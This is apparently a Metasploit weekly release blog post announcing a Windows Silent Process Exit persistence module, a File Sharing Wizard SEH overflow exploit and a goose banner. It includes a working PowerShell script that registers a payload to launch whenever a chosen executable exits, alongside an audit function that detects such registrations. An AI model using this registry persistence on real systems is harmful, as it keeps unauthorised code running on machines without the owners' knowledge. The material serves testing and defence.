Last updated at Wed, 17 Jan 2024 01:53:12 GMT

Exploiting Windows tools

There are two new Windows modules this week, both brought to you by the Metasploit team.

The Windows Silent Process Exit Persistence module, from our own bwatters-r7, abuses Windows' Silent Process Exit monitoring, a debugging feature that launches a configured monitor process whenever a specified executable exits. The feature is switched on through the Image File Execution Options and SilentProcessExit keys under HKLM, so the module needs elevated privileges; with those, an attacker can use the module to upload a payload and register it as the monitor process, after which the payload runs every time the chosen binary exits.
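To make the mechanism concrete, here is an added PowerShell example (written for this post, not the Metasploit module's own code) that does two things: registers a command as the silent-exit monitor for a given executable using the documented registry values, and audits a host for existing registrations so a defender can spot this persistence. The registry paths, the 0x200 GlobalFlag bit and ReportingMode value 1 are documented Windows behaviour; the function names, the sample executable and the sample command are assumptions chosen for illustration. Both functions read or write HKLM, so run them elevated; the registration function supports -WhatIf.

```powershell
# Added example, not part of the Metasploit module. Registry locations and flag
# values are the documented Silent Process Exit settings; names are illustrative.

$SpeRoot  = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit'
$IfeoRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$FLG_MONITOR_SILENT_PROCESS_EXIT = 0x200   # GlobalFlag bit that enables the feature
$REPORTING_LAUNCH_MONITORPROCESS = 1       # ReportingMode bit: launch MonitorProcess

function Register-SilentProcessExitMonitor {
    # Registers $Command to be launched every time $Executable exits.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param(
        [Parameter(Mandatory)] [string] $Executable,   # image name only, e.g. notepad.exe
        [Parameter(Mandatory)] [string] $Command       # full command line of the monitor process
    )
    $ifeoKey = Join-Path $IfeoRoot $Executable
    $speKey  = Join-Path $SpeRoot  $Executable
    if ($PSCmdlet.ShouldProcess($Executable, "register '$Command' as silent-exit monitor")) {
        foreach ($k in $ifeoKey, $speKey) {
            if (-not (Test-Path $k)) { New-Item -Path $k -Force | Out-Null }
        }
        # Preserve any existing GlobalFlag bits and OR in the monitoring bit.
        $current = [int]((Get-ItemProperty -Path $ifeoKey -ErrorAction SilentlyContinue).GlobalFlag)
        $updated = $current -bor $FLG_MONITOR_SILENT_PROCESS_EXIT
        Set-ItemProperty -Path $ifeoKey -Name GlobalFlag     -Value $updated -Type DWord
        Set-ItemProperty -Path $speKey  -Name ReportingMode  -Value $REPORTING_LAUNCH_MONITORPROCESS -Type DWord
        Set-ItemProperty -Path $speKey  -Name MonitorProcess -Value $Command -Type String
    }
}

function Get-SilentProcessExitMonitors {
    # Lists every image with a SilentProcessExit key and says whether the
    # registration is actually armed (feature bit set, launch mode on, command present).
    if (-not (Test-Path $SpeRoot)) { return @() }

    foreach ($key in Get-ChildItem -Path $SpeRoot) {
        $exe   = $key.PSChildName
        $props = Get-ItemProperty -Path $key.PSPath
        $ifeo  = Get-ItemProperty -Path (Join-Path $IfeoRoot $exe) -ErrorAction SilentlyContinue
        $flag  = [int]$ifeo.GlobalFlag
        $mode  = [int]$props.ReportingMode

        $armed = (($flag -band $FLG_MONITOR_SILENT_PROCESS_EXIT) -ne 0) -and
                 (($mode -band $REPORTING_LAUNCH_MONITORPROCESS) -ne 0) -and
                 (-not [string]::IsNullOrEmpty($props.MonitorProcess))

        [PSCustomObject]@{
            Executable     = $exe
            MonitorProcess = $props.MonitorProcess
            ReportingMode  = $mode
            GlobalFlag     = ('0x{0:X}' -f $flag)
            Armed          = $armed
        }
    }
}

# Usage (illustrative values): dry-run a registration, then audit the host.
Register-SilentProcessExitMonitor -Executable 'notepad.exe' -Command 'C:\Temp\payload.exe' -WhatIf
Get-SilentProcessExitMonitors | Format-Table -AutoSize
```

The audit deliberately checks all three conditions, because a SilentProcessExit key on its own does nothing: the IFEO GlobalFlag bit must be set and ReportingMode must include the launch bit before Windows will start the monitor process. Hunting only for MonitorProcess values will miss half-configured entries and, more importantly, flag benign leftovers from legitimate debugging sessions as live persistence.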

The File Sharing Wizard - POST SEH Overflow module, contributed by our own dwelch-r7, exploits a vulnerability in the Windows File Sharing Wizard. An overlong, unauthenticated HTTP POST request overflows a stack buffer and overwrites a Structured Exception Handler (SEH) record, which lets a remote attacker gain arbitrary code execution on vulnerable Windows targets.

Untitled Goose Banner

A contribution by 0xGilda addresses a glaring omission from msfconsole, which is its lack of Untitled Goose Game homages. A new goose banner has been added, which you can now see on startup. HONK!

                                   ___          ____
                               ,-""   `.      < HONK >
                             ,'  _   e )`-._ /  ----
                            /  ,' `-._<.===-'
                           /  /
                          /  ;
              _          /   ;
 (`._    _.-"" ""--..__,'    |
 <_  `-""                     \
  <`-                          :
   (__   <__.                  ;
     `-.   '-.__.      _.'    /
        \      `-.__,-'    _,'
         `._    ,    /__,-'
            ""._\__,'< <____
                 | |  `----.`.
                 | |        \ `.
                 ; |___      \-``
                 \   --<
                  `.`.<
                    `-'

       =[ metasploit v5.0.54-dev-82c77a4ec8               ]
+ -- --=[ 1931 exploits - 1079 auxiliary - 332 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > 

New modules (2)

Enhancements and features

  • PR #12398 by nsa adds documentation for the auxiliary/scanner/ssh/ssh_version module.
  • PR #12368 by h00die adds documentation for the auxiliary/server/capture/smb module.
  • PR #12396 by bwatters-r7 updates metasploit-payloads to version 1.3.78, which adds support for key event management in Java payloads.
  • PR #12388 by zeroSteiner adds metadata to the SMB client library, which enables detection of required signatures for incoming connections to the target host.

Bugs fixed

  • PR #12432 by busterb fixes a false negative bug in the BlueKeep scanner by checking the length of the result from an rdp_recv call in the RDP library.
  • PR #12404 by bcoles fixes a bug with the shell session handler that resulted in unexpected deletion of directories when the path contained a space.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

We recently announced the release of Metasploit 5. You can get it by cloning the Metasploit Framework repo (master branch). To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial editions).